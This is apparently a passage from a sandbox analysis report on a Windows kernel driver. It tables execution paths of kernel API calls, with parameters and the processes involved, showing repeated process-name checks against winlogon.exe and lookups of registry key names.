| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f25ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xea, ret_val_ptr_out = 0xffffe0003a763e10 |
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0xea, ObjectNameInfo_unk_out = 0xffffe0003a763e10, ReturnLength_ptr_out = 0xffffd0002f25ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\A\{C4623AC2-A839-4F8E-B441-AFF5C080B156}\Server\CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca, DestinationString_out = \REGISTRY\A\{C4623AC2-A839-4F8E-B441-AFF5C080B156}\Server\CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763e10, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\A\{C4, ret_val_out = 20 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763f10, Tag = 0x0 |
Execution Path #37 (length: 13, count: 3, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 13 |
Processes
»
| Process | Count |
|---|---|
| Process 36 (wmiadap.exe, PID: 3776) | 3 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 |
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8df4a80, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b8df4a80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8df4a80, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b8df4a80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 |
| ObQueryNameString | Object_ptr = 0xffffc000b8df4a80, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
Execution Path #50 (length: 18, count: 2, processes: 2)
»
| Information | Value |
|---|---|
| Sequence Length | 18 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 1 |
| Process 112 (backgroundtaskhost.exe, PID: 3212) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
Execution Path #64 (length: 2, count: 16, processes: 2)
»
| Information | Value |
|---|---|
| Sequence Length | 2 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 15 |
| Process 10 (svchost.exe, PID: 1000) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
Execution Path #173 (length: 260, count: 1, processes: 1 incomplete)
»
| Information | Value |
|---|---|
| Sequence Length | 260 |
Processes
»
| Process | Count |
|---|---|
| Process 42 (iexplore.exe, PID: 556) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0d73f0, ret_val_out = 1 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x9c, ret_val_ptr_out = 0xffffe0003af83ef0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0d73f0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0d73f0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002cf5ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x9a, ret_val_ptr_out = 0xffffe0003af95f60 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0d73f0, Length = 0x9a, ObjectNameInfo_unk_out = 0xffffe0003af95f60, ReturnLength_ptr_out = 0xffffd0002cf5ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Main, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Main |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af95f60, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af83ef0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba370400, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba370400, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002cf5afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xe2, ret_val_ptr_out = 0xffffe0003a763f10 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba370400, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba370400, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002cf5ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xe0, ret_val_ptr_out = 0xffffe0003a76faa0 |
| ObQueryNameString | Object_ptr = 0xffffc000ba370400, Length = 0xe0, ObjectNameInfo_unk_out = 0xffffe0003a76faa0, ReturnLength_ptr_out = 0xffffd0002cf5ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Internet Explorer\Main, DestinationString_out = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Internet Explorer\Main |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76faa0, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 |
| _wcsicmp | _String1 = \SOFTWARE\Microsoft\Internet Explorer\Main, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -14 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763f10, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba3533f0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba3533f0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002cf5afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x8a, ret_val_ptr_out = 0xffffe0003a7824c0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba3533f0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba3533f0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002cf5ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x88, ret_val_ptr_out = 0xffffe0003a7873e0 |
| ObQueryNameString | Object_ptr = 0xffffc000ba3533f0, Length = 0x88, ObjectNameInfo_unk_out = 0xffffe0003a7873e0, ReturnLength_ptr_out = 0xffffd0002cf5ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7873e0, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7824c0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba27e8e0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba27e8e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002cf5afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, ret_val_ptr_out = 0xffffe0003c6341c0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba27e8e0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba27e8e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002cf5ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x78, ret_val_ptr_out = 0xffffe0003a763520 |
| ObQueryNameString | Object_ptr = 0xffffc000ba27e8e0, Length = 0x78, ObjectNameInfo_unk_out = 0xffffe0003a763520, ReturnLength_ptr_out = 0xffffd0002cf5ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\OLE\Extensions, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\OLE\Extensions |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763520, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0d73f0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0d73f0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002cf5afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x9c, ret_val_ptr_out = 0xffffe0003af83ef0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0d73f0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0d73f0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002cf5ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x9a, ret_val_ptr_out = 0xffffe0003af95f60 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0d73f0, Length = 0x9a, ObjectNameInfo_unk_out = 0xffffe0003af95f60, ReturnLength_ptr_out = 0xffffd0002cf5ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Main, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Main |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af95f60, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af83ef0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba370400, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba370400, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002cf5afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xe2, ret_val_ptr_out = 0xffffe0003a763f10 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba370400, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba370400, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002cf5ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xe0, ret_val_ptr_out = 0xffffe0003a76faa0 |
| ObQueryNameString | Object_ptr = 0xffffc000ba370400, Length = 0xe0, ObjectNameInfo_unk_out = 0xffffe0003a76faa0, ReturnLength_ptr_out = 0xffffd0002cf5ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Internet Explorer\Main, DestinationString_out = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Internet Explorer\Main |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76faa0, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 |
| _wcsicmp | _String1 = \SOFTWARE\Microsoft\Internet Explorer\Main, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -14 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763f10, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba3533f0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba3533f0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002cf5afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x8a, ret_val_ptr_out = 0xffffe0003a77c910 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba3533f0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba3533f0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002cf5ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x88, ret_val_ptr_out = 0xffffe0003a77c870 |
| ObQueryNameString | Object_ptr = 0xffffc000ba3533f0, Length = 0x88, ObjectNameInfo_unk_out = 0xffffe0003a77c870, ReturnLength_ptr_out = 0xffffd0002cf5ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a77c870, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a77c910, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b81a6470, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b81a6470, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002cf5afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, ret_val_ptr_out = 0xffffe0003c6341c0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b81a6470, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b81a6470, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002cf5ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x78, ret_val_ptr_out = 0xffffe0003a763520 |
| ObQueryNameString | Object_ptr = 0xffffc000b81a6470, Length = 0x78, ObjectNameInfo_unk_out = 0xffffe0003a763520, ReturnLength_ptr_out = 0xffffd0002cf5ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\OLE\Extensions, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\OLE\Extensions |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763520, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0d73f0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0d73f0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002cf5afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x9c, ret_val_ptr_out = 0xffffe0003af83ef0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0d73f0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0d73f0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002cf5ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x9a, ret_val_ptr_out = 0xffffe0003af95f60 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0d73f0, Length = 0x9a, ObjectNameInfo_unk_out = 0xffffe0003af95f60, ReturnLength_ptr_out = 0xffffd0002cf5ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Main, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Main |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af95f60, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af83ef0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba370400, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba370400, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002cf5afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xe2, ret_val_ptr_out = 0xffffe0003a763f10 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba370400, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba370400, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002cf5ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xe0, ret_val_ptr_out = 0xffffe0003a76faa0 |
| ObQueryNameString | Object_ptr = 0xffffc000ba370400, Length = 0xe0, ObjectNameInfo_unk_out = 0xffffe0003a76faa0, ReturnLength_ptr_out = 0xffffd0002cf5ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Internet Explorer\Main, DestinationString_out = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Internet Explorer\Main |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76faa0, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 |
| _wcsicmp | _String1 = \SOFTWARE\Microsoft\Internet Explorer\Main, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -14 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763f10, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
